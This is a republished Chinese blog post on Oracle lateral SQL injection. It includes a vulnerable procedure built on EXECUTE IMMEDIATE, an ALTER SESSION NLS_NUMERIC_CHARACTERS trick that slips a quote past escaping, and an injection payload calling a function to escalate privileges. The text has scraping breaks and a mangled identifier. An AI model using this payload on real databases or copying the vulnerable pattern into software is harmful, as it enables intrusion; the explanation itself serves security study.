脚本宝典收集整理的这篇文章主要介绍了ORACLE LATERAL-SQL-INJECTION 个人见解,脚本宝典觉得挺不错的,现在分享给大家,也给大家做个参考。
如果直接执行
SQL语句
或者参数绑定则
不用担心太多,
如以下
oracle存储过程
create&nbs
p;or replace
PRocedure kjdatepoc(date d)
as
be
gin insert into kjdatetable values(d);
comm
IT;
end;
根本不需要担心遭受到SQL新型注入攻击,那么在什么地方会发生DATE 以及 NUMBER的注入攻击呢!?一般都是采用了动态SQL而又不采用参数绑定的语句。
例如工程师经常用的DBMS_SQL或者EXECUTE IMMEDIATE
看以下存储过程
create or replace procedure kjdatepoc(date d)
as
begin
execute immediate ‘insert into kjdatetable values('|| d ||')';
commit;
end;
那么遇到以上的存储过程或者函数等,也通过修改SESSION中的NLS_DATE_FORMAT中的值达到SQL注射的目的,
老外的PA
PER
讲解得非常详细了 ,我在这里也不废话。
惟独对于 NUMBER类型的注射没有多作讲解 只是
简单演示了可以输出单引号!
看以下语句
ALTER SESSION SET NLS_NUMERIC_CHARACTERS=”'.';
SELECT to_number(1000.10001,'999999D99999′)||”
From DUAL;
输出一下结果
1000′10001
只是多了一个单引号,那有什么用呢?乐观的来说!在特定情况下是很有
价值的!看以下一个存储过程
create or replace procedure NumInjPoc(kje
xpnum number,kjexpstr v@R_
777_2413@ar2)
is
SecStr
VARchar2(1000);
begin
SecStr:=replace(kjexpstr,””,”””);
Sys.dbms_output.put_line('SELECT * F
rom DUAL WHERE ID='||kjexpnum||' and n
ame=”'||SecStr||””);
end;
内部对varchar类型进行替换了!我们可以进行测试
begin
numinjpoc(1000,”'–');
end;
其输出SQL语句为
SELECT * FROM DUAL WHERE ID=1000 and name=”'–'
单引号被转义掉了
那么如果我们结合这个NUMBER类型怎么进行注射呢?
ALTER SESSION SET NLS_NUMERIC_CHARACTERS=”'.';
begin
numinjpoc(TO_NUMBER(0.10001,'999999D99999′),'||kj.exp()–');
end;
看看输出结果
SELECT * FROM DUAL WHERE ID='10001 and name='||kj.exp()–'
这样就可以间接的攻击它…
在某中程度才来需要ALTER SESSION 配合后,再去攻击系统内部的一些函数或者过程来
提升权限。未尝不是一种好的
突破思路,但是对于单语句进行SQL注射攻击,以结果为向导的话!这样的方式没多大作为。
脚本宝典总结
以上是脚本宝典为你收集整理的ORACLE LATERAL-SQL-INJECTION 个人见解全部内容,希望文章能够帮你解决ORACLE LATERAL-SQL-INJECTION 个人见解所遇到的问题。
如果觉得脚本宝典网站内容还不错,欢迎将脚本宝典推荐好友。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。